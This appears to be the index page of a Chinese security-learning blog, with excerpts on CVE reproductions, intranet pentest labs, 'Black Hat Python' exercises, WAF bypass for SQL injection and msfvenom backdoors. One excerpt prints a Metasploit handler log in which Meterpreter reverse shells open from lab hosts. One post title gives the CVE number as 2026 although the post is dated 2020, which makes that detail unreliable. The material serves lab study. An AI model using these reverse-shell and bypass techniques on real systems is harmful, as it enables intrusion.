Rainwo's Blog

pgAdmin4 CVE-2025-13780漏洞复现

Sun, 31 May 2026 00:00:00 +0000

漏洞详情
#

pgAdmin 是一个流行且功能丰富的开源 PostgreSQL 数据库管理和开发平台，广泛被数据库管理员和开发者用于通过 Web 界面管理 PostgreSQL 数据库。

该漏洞存在于 pgAdmin4 的数据库恢复（Restore）工具中，该工具使用 psql 命令行程序执行用户上传的纯文本 SQL 文件。攻击者可以利用特殊字符绕过 pgAdmin4 对文件内容的安全检查，在 SQL 文件中嵌入元命令（\!），从而通过 psql 程序在服务器上执行任意系统命令，实现远程代码执行。

关于

Sun, 31 May 2026 00:00:00 +0000

👋 关于我
#

一个安全行业的小透明，在这里记录自己的学习经历。

📬 联系方式
#

GitHub: @rainwoo
Email: hiwuyu@foxmail.com

🛠️ 技术栈
#

静态网站生成器: Hugo
主题: Blowfish
配色方案: Marvel（黑客风）

内网渗透靶场实践

Sat, 10 Apr 2021 00:00:00 +0000

内网渗透-2
#

公众号上HACK学习呀上面的一篇内网渗透文章，收益颇多，本篇文章实验部分为自己重现

重现时遇到各式各样的奇葩问题，现均已解决

原文链接：https://mp.weixin.qq.com/s/UIGYJvfNAty7ywg3EBjTJw

靶场地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/6/

本次靶场渗透包括反序列化漏洞、命令执行漏洞、Tomcat漏洞、MS系列漏洞、端口转发漏洞、以及域渗透等多种组合漏洞。

知识点
#

st漏洞利用
phpmyadmin getshell
tomcat 漏洞利用
docker逃逸
ms14-068
ssh密钥利用
流量转发
历史命令信息泄露
域渗透

环境配置
#

共三台靶机，导入到VMware中

《Python黑帽子》python3代码实现(第六章)

Sun, 27 Dec 2020 00:00:00 +0000

第六章扩展Burp代理
#

这一章的学习，个人感觉比前面几章稍微有难度一些，虽然过程挺艰苦的，但还算是勉强做出来了吧：）

这一章节的内容，因为jython对python3的兼容性不乐观，所以我们将使用python2编写代码。

Jython？
#

Jython是一种完整的语言，而不是一个Java翻译器或仅仅是一个Python编译器，它是一个Python语言在Java中的完全实现。Jython也有很多从CPython中继承的模块库。最有趣的事情是Jython不像CPython或其他任何高级语言，它提供了对其实现语言的一切存取。所以Jython不仅给你提供了Python的库，同时也提供了所有的Java类。这使其有一个巨大的资源库。

CVE-2026-0796漏洞复现

Sun, 08 Nov 2020 00:00:00 +0000

即17年永恒之蓝后，又爆出永恒之黑，445不愧是安全工程师的噩梦。

漏洞简介
#

Microsoft Windows和Microsoft Windows Server都是美国微软（Microsoft）公司的产品。Microsoft Windows是一套个人设备使用的操作系统。Microsoft Windows Server是一套服务器操作系统。Server Message Block是其中的一个服务器信息传输协议。

Microsoft Server Message Block 3.1.1 (SMBv3)版本中存在输入验证错误漏洞，该漏洞源于SMBv3协议在处理恶意压缩数据包时，进入了错误流程。远程未经身份验证的攻击者可利用该漏洞在应用程序中执行任意代码。以下产品及版本受到影响：Microsoft Windows 10版本1903，Windows Server版本1903，Windows 10版本1909，Windows Server版本1909。

MSF内网渗透

Fri, 06 Nov 2020 00:00:00 +0000

本文转载自https://www.freebuf.com/articles/network/125278.html

本文实操部分均为本人复现

纵深防御也被被称之为“多层防御”，这样的概念被运用于“信息安全”上。以多层电脑安全技术去减轻其风险，在其中有些电脑被入侵或是泄密时，风险可以大大降低。举例来说，防毒软件被安装于个人工作站上，电脑中病毒在防火墙与服务器等其它类似环境中被拦劫下来。在信息技术世界中占据着举足轻重的地位。本文我们将通过示例分析攻击者是如何运用各种方法进行网络穿透的。

何谓路由
#

确定设备如何在不同网络之间相互传输的过程，也即通过互联的网络把信息从源地址传输到目的地址的活动被称之为路由。通常用于执行路由活动的设备被称为路由器。通过使用路由表，路由器则规划网络包到各自目的地的线路。路由的功能不仅仅是诸如路由器等网络设备能够完成，在安装有该功能的任意计算机系统也能够完成。

根据上图例子所示，为了在192.168.1.0/24与192.168.10.0/24网络之间进行通信是需要一个路由表记录的。根据路由器中的规则定义，数据需要从192.168.1.0/24源网络发到192.168.10.0/24目的网络中去。网络数据包大概会经历如下过程：

要访问的IP地址是否就在本地网络？
- 是否到达目的地
- 否则发送到网关
路由器接收到数据包就会查看其路由表

MSF提权操作

Fri, 30 Oct 2020 00:00:00 +0000

最近有个问题苦恼了我很久，“msf”是否可以控制多台服务器，怎么通过“msf”进行提权操作？

这里我直接开启了两台win7SP1X64的主机，通过运行后门的方式获得shell，这里生成shell的步骤略过。

获得服务器shell
#

首先我们在kali里面开启msf并调用exploit/multi/handler

msf5 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.142.19
lhost => 192.168.142.19
msf5 exploit(multi/handler) > set exitonsession false
exitonsession => false
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.142.19:4444 
msf5 exploit(multi/handler) > [*] Sending stage (176195 bytes) to 192.168.142.24
[*] Meterpreter session 1 opened (192.168.142.19:4444 -> 192.168.142.24:52612) at 2020-10-30 10:15:32 +0800

msf5 exploit(multi/handler) > 
[*] Sending stage (176195 bytes) to 192.168.142.101
[*] Meterpreter session 2 opened (192.168.142.19:4444 -> 192.168.142.101:49230) at 2020-10-30 10:15:50 +0800

msf5 exploit(multi/handler) > sessions 

Active sessions
===============

  Id  Name  Type                     Information          Connection
  --  ----  ----                     -----------          ----------
  1         meterpreter x86/windows  WY-PC\WY @ WY-PC     192.168.142.19:4444 -> 192.168.142.24:52612 (192.168.200.128)
  2         meterpreter x86/windows  W-Y-PC\W-Y @ W-Y-PC  192.168.142.19:4444 -> 192.168.142.101:49230 (192.168.142.101)

msf5 exploit(multi/handler) >

这里要特别注意两个位置：

SQL注入之安全狗绕过

Wed, 28 Oct 2020 00:00:00 +0000

最近在网上挖洞时，总会遇到烦人的安全狗，研究了一天发现绕过安全狗出奇的简单，只需要语法犀利即可。

前言：
#

相信在网络上做渗透测试时，总会遇到如下情况：

这是网站管理员在服务器上安装了安全狗，安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖了网马/木马扫描、防SQL注入、防盗链、防CC攻击、网站流量实时监控、网站CPU监控、下载线程保护、IP黑白名单管理、网页防篡改功能（结合安全狗云安全中心使用）等模块。能够为用户提供实时的网站安全防护，避免各类针对网站的攻击所带来的危害。我们这次实验就是针对sql注入，绕过安全狗的防护机制。话不多说，下面我们开始这次实验。

实验环境：
#

操作系统：Windows Server 2008 R2

《Python黑帽子》python3代码实现(第五章)

Wed, 21 Oct 2020 00:00:00 +0000

第五章 Web攻击
#

Web的套接字函数库：urllib2 （Requests）
#

这里原著中python2所使用的urllib2模块要被淘汰了，这里我们使用python3的requests模块实现相同的功能。

VulnHub靶场系列：Chili)

Mon, 05 Oct 2020 00:00:00 +0000

VulnHub靶场系列：Chili
#

刚刚在VulnHub官网上找了些简单的靶机，感觉这个还挺适合新手的

环境部署：
#

https://download.vulnhub.com/chili/Chili.ova

实战：
#

首先使用工具扫描靶机所在网段，得到靶机IP：

VulnHub靶场系列：Flick)

Sat, 03 Oct 2020 00:00:00 +0000

VulnHub靶场系列：Flick
#

今天意外看到一个VulnHub上的一个靶场的WriteUp，觉得挺有意思，所以自己试着做一遍并记录下来。

环境部署：
#

下载靶场并导入到VMware中：

Msfvenom生成后门及运用

Thu, 01 Oct 2020 00:00:00 +0000

Msfvenom生成后门及运用
#

本篇文章将会使用msfvenom来创建木马，然后通过msfconsole中的expoit/multi/handler来反弹靶机shell。

后门的生成：
#

首先通过各种操作系统，脚本语言来生成后门：常用参数说明：

《Python黑帽子》python3代码实现(第四章)

Thu, 03 Sep 2020 00:00:00 +0000

第四章 Scapy: 网络的掌控者
#

窃取Email认证
#

在我们敲写这一段程序之前我们需要知道scapy是不支持Windows操作系统的，所以此章节所有的脚本都必须在Linux系统上面运行，接下来我们简单了解下嗅探器sniff()方法：

《Python黑帽子》python3代码实现(第三章)

Wed, 02 Sep 2020 00:00:00 +0000

第三章网络：原始套接字和流量嗅探
#

Windows上和Linux上的包嗅探
#

在示例中，我们首先导入socket与os模块，根据os.name判断主机操作系统，该变量属性当前只注册了三个值，具体如下：

《Python黑帽子》python3代码实现(第二章)

Mon, 24 Aug 2020 00:00:00 +0000

《Python黑帽子》代码实现
#

本篇笔记全部用python3实现，本人大一在校生第一次写博客，有错误之处希望大家积极指出。参考大佬博客： https://www.cnblogs.com/zhangyuxiang666/p/11010581.html https://blog.csdn.net/qq_39038028/article/details/72860112

第二章网络基础:
#

创建Tcp客户端（tcpClient.py):
#

示例中引用了首先导入socket模块，使用socket()方法来创建套接字并实例化对象，AF_INET表明IPv4地址，SOCK_STREAM表明是关于TCP套接字，然后使用connect()方法连接tcp服务端，使用send()和recv()方法来发送和接受数据，这里需要注意的是python3套接字的传输需要将数据转为byte的形式，使数据可视化又需要解码为str，这里是简单的构造了一个http请求。

Rainwo's Blog

pgAdmin4 CVE-2025-13780漏洞复现

漏洞详情 #

关于

👋 关于我 #

📬 联系方式 #

🛠️ 技术栈 #

内网渗透靶场实践

内网渗透-2 #

知识点 #

环境配置 #

《Python黑帽子》python3代码实现(第六章)

第六章 扩展Burp代理 #

Jython？ #

CVE-2026-0796漏洞复现

漏洞简介 #

MSF内网渗透

何谓路由 #

MSF提权操作

获得服务器shell #

SQL注入之安全狗绕过

前言： #

实验环境： #

《Python黑帽子》python3代码实现(第五章)

第五章 Web攻击 #

Web的套接字函数库：urllib2 （Requests） #

VulnHub靶场系列：Chili)

VulnHub靶场系列：Chili #

环境部署： #

实战： #

VulnHub靶场系列：Flick)

VulnHub靶场系列：Flick #

环境部署： #

Msfvenom生成后门及运用

Msfvenom生成后门及运用 #

后门的生成： #

《Python黑帽子》python3代码实现(第四章)

第四章 Scapy: 网络的掌控者 #

窃取Email认证 #

《Python黑帽子》python3代码实现(第三章)

第三章 网络：原始套接字和流量嗅探 #

Windows上和Linux上的包嗅探 #

《Python黑帽子》python3代码实现(第二章)

《Python黑帽子》代码实现 #

第二章 网络基础: #

创建Tcp客户端（tcpClient.py): #

漏洞详情
#

👋 关于我
#

📬 联系方式
#

🛠️ 技术栈
#

内网渗透-2
#

知识点
#

环境配置
#

第六章扩展Burp代理
#

Jython？
#

漏洞简介
#

何谓路由
#

获得服务器shell
#

前言：
#

实验环境：
#

第五章 Web攻击
#

Web的套接字函数库：urllib2 （Requests）
#

VulnHub靶场系列：Chili
#

环境部署：
#

实战：
#

VulnHub靶场系列：Flick
#

环境部署：
#

Msfvenom生成后门及运用
#

后门的生成：
#

第四章 Scapy: 网络的掌控者
#

窃取Email认证
#

第三章网络：原始套接字和流量嗅探
#

Windows上和Linux上的包嗅探
#

《Python黑帽子》代码实现
#

第二章网络基础:
#

创建Tcp客户端（tcpClient.py):
#